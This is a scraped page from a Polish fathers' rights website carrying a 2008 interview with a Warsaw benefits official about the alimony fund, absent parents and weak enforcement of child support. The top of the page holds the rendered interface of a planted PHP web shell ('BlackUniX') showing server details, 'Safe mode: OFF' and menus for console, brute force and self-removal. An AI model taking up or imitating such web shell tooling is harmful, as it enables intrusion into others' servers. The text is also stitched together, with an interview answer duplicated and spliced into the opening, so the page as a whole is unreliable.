W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:20:02
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Rozmowa nt. funduszu alimentacyjnego
01.08.2008.
Na razie jest tak, że w końcowym etapie postępowania kierujemy sprawę do prokuratury. W tym momencie prokuratura wszczyna postępowanie, wzywa wierzycielkę. I tu zdarza się, że dostaję informację, że kobieta nie chce ścigać tego dłużnika. Moim zdaniem, kiedy dostajemy taką odpowiedź, że pani nie chce ścigać dłużnika, powinna mieć natychmiast uchyloną decyzję o przyznaniu świadczenia. Bo to jest coś nie tak, kiedy dłużnik nie płaci alimentów, to chyba naturalne, że wierzycielce musi zależeć na ściganiu tego pana. Nie twierdzę, że tak jest zawsze, ale zdarzają się takie sytuację. Krótko mówiąc, wierzycielka nie współpracujeK.B. Czemu rodzice nie płacą alimentów:

Barbara Leoniak: Najczęściej nie płacą alimentów panowie. Panie są rzadkością. Panowie mówią, że nie mają z czego płacić, a taka standardowa odpowiedziedź - to "nie będę płacić na byłą żonę" nie określają, że to są alimenty na dziecko, tylko traktują to jako świadczenie na byłą żonę, czy matkę dziecka.

Wierzy im Pani?

Nie

Jakie ostatnio zaszły zmiany w funduszu alimentacyjnym?

Fundusz alimentacyjny wprowadza zasadniczą zmianę, że mogą korzystać z niego wszystkie osoby: mężatka, osoba wspólnie wychowująca dziecko z ojcem dziecka.
Pojawił się wyrok TK, który orzeka, że zapisy obowiązujące przy zaliczce alimentacyjnej były niezgodne z konstytucją. [Zaliczka alimentacyjna obowiązuje do września] wg nich zaliczki nie mogła brać mężatka i osoba wychowująca dziecko wspólnie z jego ojcem. Trybunał uchylił ten zapis. Od 7 lipca mężatki i osoby wychowujące (również inne) dziecko (inne) wspólnie z jego ojcem mają prawo do zaliczki.
Zwiększyła się także kwota dochodu z 583 zł.  do 725 zł. Jest również podwyższona kwota świadczenia do 500 zł.

Jakie możliwości mają osoby poszkodowane poprzednimi niekonstytucyjnymi przepisami?

Takie osoby mogą już złożyć wnioski i do końca września przyznamy im zaliczkę.

Czy dostaną wyrównanie?

 Tak, jeżeli złożą wniosek do 7 sierpnia - wznowimy postępowanie i przyznamy świadczenia.

Jakie Pani zdaniem należałoby wprowadzić zmiany, aby poprawić ściągalność alimentów?

Na razie jest tak, że w końcowym etapie postępowania kierujemy sprawę do prokuratury. W tym momencie prokuratura wszczyna postępowanie, wzywa wierzycielkę. I tu zdarza się, że dostaję informację, że kobieta nie chce ścigać tego dłużnika. Moim zdaniem, kiedy dostajemy taką odpowiedź, że pani nie chce ścigać dłużnika, powinna mieć natychmiast uchyloną decyzję o przyznaniu świadczenia. Bo to jest coś nie tak, kiedy dłużnik nie płaci alimentów, to chyba naturalne, że wierzycielce musi zależeć na ściganiu tego pana. Nie twierdzę, że tak jest zawsze, ale zdarzają się takie sytuację. Krótko mówiąc, wierzycielka nie współpracuje.

Jak wygląda współpraca z komornikiem?


Generalnie komornicy się starają... Ale na ogół ludzie ci nie mają żadnego majątku. Więc komornik niewiele może zrobić. Jeśli dłużnik pracuje - komornik wchodzi na wynagrodzenie. Jeśli ma zasiłek stały, to komornik wchodzi na część tego świadczenia. Często komornicy mają problemy ze zlokalizowaniem dłużników - wtedy współpracują z policją.
Jeśli komornik zgłasza przyczyny bezskuteczności egzekucji, wtedy przyjmujemy postępowanie. Dłużnik jest zarejestrowany w urzędzie pracy, jako osoba bezrobotna. My, jako urząd musimy go aktywizować. Często otrzymujemy informację, że dłużnik dostał kilka ofert pracy, ale pracodawca go nie wybrał. Tymczasem nieoficjalnie wygląda to tak, że dłużnik idzie do pracodawcy i w rozmowie mu mówi, że jest chory itd. więc pracodawca nie chce go zatrudnić... Czyli dłużnicy nawet mając oferty też nie są zainteresowani. Przypuszczalnie pracują na czarno, bo przecież z czegoś muszą żyć. Nie chcą mieć stałej pracy, żeby komornik nie wchodził na ich pensję. Bywa tak, że dłużnik podejmuje pracę. Wtedy komornik wysyła wniosek o zajęcie poborów, a wtedy dłużnik zwalnia się.

Jak można by scharakteryzować przeciętnego dłużnika?

Nie mają majątku, bo gdyby mieli, to by został zajęty przez komornika. Często korzystają z pomocy społecznej. Są zarejestrowani, jako bezrobotni, bez prawa do zasiłku, nie mają pracy. Albo są to też osoby chore. Zamożnych dłużników jest bardzo niewielu.

Czy ostatnie zmiany poprawią ściągalność alimentów?

...może poprawi, bo będziemy zobowiązani do współpracy z urzędami skarbowymi. Jeśli dłużnik nie będzie płacił, oczywiście na koniec roku dostanie rozliczenie, to my będziemy wnosić o tytuł wykonawczy do urzędu skarbowego.
Egzekucja jest bardzo mizerna, poniżej 1 %.

Czemu służyło przeniesienie działów świadczeń z ośrodków pomocy społecznej do urzędów dzielnicy?

Nie wiem, co ustawodawca miał na myśli w tym momencie.
Natomiast ten zapis już został zmieniony... teraz możemy wrócić do ośrodka pomocy społecznej, tak jak do tej pory.


Barbara Leoniak jest kierownikiem

Referatu Świadczeń Rodzinnych

w Urzędzie Dzielnicy Warszawa - Praga Północ

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.